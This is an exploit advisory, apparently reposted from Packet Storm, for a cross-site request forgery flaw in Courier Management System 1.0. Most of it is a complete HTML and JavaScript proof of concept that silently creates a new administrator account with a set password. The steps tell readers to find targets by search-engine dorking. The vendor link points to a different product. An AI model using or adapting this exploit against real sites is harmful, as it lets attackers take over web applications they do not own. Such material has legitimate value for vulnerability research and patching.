Courier Management System 1.0 Cross Site Request Forgery
2024-8-23 22:59:8 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

=============================================================================================================================================
| # Title : Courier Management System 1.0 CSRF add admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 6.

[+] Set the target site link Save changes and apply .

[+] save code as poc.html .

<!DOCTYPE html>
<html>
<body>
<script> function submitRequest()
{ var xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/courier/ajax.php?action=save_user", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");
xhr.withCredentials = true;
var body =
"-----------------------------\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"indoushka\r\n" +
"-----------------------------\r\n" +
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"Hacked\r\n" +
"-----------------------------\r\n" +
"Content-Disposition: form-data; name=\"type\"\r\n" +
"\r\n" +
"1\r\n" +
"-------------------------------\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================


文章来源: https://packetstormsecurity.com/files/180342/cms10-xsrf.txt
如有侵权请联系:admin#unsafe.sh